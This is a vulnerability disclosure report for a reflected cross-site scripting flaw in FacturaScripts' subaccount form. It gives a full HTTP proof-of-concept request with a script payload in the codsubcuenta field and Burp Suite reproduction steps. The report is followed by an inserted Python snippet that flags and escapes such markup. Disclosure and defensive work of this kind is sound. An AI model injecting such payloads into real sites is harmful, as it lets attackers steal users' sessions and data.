Cross-site scripting - Reflected in Create Subaccount in neorazorx/facturascripts
Valid
Reported on
Apr 30th 2022
Description
Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.
Proof of Concept
POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"

insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"

EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"

<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"

123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"

2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"

CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"

0
-----------------------------363416527826407339693188325960--
Steps to reproduce
- In the Accounting section, choose New and fill in the whole form with any values.
- Use Burp Suite to intercept this request, replace the codsubcuenta parameter value with the XSS payload and click Forward.
- alert(1337) executes.
Impact
This vulnerability allows arbitrary JavaScript to run in the victim's browser, e.g. to steal the user's cookies, perform HTTP requests, read the content of same-origin pages, etc.
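As an added example (not part of the report or of the FacturaScripts code base), a small Python check that parses a multipart body shaped like the PoC above, flags fields carrying markup, and shows the HTML-escaped form in which a value such as codsubcuenta should be echoed back. The body below is constructed from the report's field names and boundary; the marker regex is a deliberately simple heuristic.

```python
import html
import re
from typing import Dict, List

# Constructed sample: the PoC's multipart body, trimmed to three fields.
BOUNDARY = "---------------------------363416527826407339693188325960"
SAMPLE_BODY = "\r\n".join([
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="action"',
    "",
    "insert",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="codsubcuenta"',
    "",
    "<script>alert(1337)</script>",
    f"--{BOUNDARY}",
    'Content-Disposition: form-data; name="descripcion"',
    "",
    "123123",
    f"--{BOUNDARY}--",
    "",
])

# Heuristic markers for HTML/JS injection in a text field (tags, event
# handlers, javascript: URLs). Tune before using on real traffic.
XSS_MARKERS = re.compile(r"<\s*/?\s*\w+|on\w+\s*=|javascript:", re.IGNORECASE)


def parse_multipart(body: str, boundary: str) -> Dict[str, str]:
    """Split a multipart/form-data body into {field name: value} (text parts only)."""
    fields: Dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields


def flag_suspicious_fields(fields: Dict[str, str]) -> List[str]:
    """Return the names of fields whose value looks like injected markup."""
    return sorted(n for n, v in fields.items() if XSS_MARKERS.search(v))


def render_safe(value: str) -> str:
    """Escape a value for safe inclusion in HTML text or attribute context."""
    return html.escape(value, quote=True)
```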
We are processing your report and will contact the neorazorx/facturascripts team within 24 hours.
a year ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back.
a year ago
@nhienit2010 - our system will reach out to the maintainer automatically and notify them of your report. The maintainer is extremely active on the platform, so I am sure you will hear back shortly ♥️
The researcher's credibility has increased: +7
Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help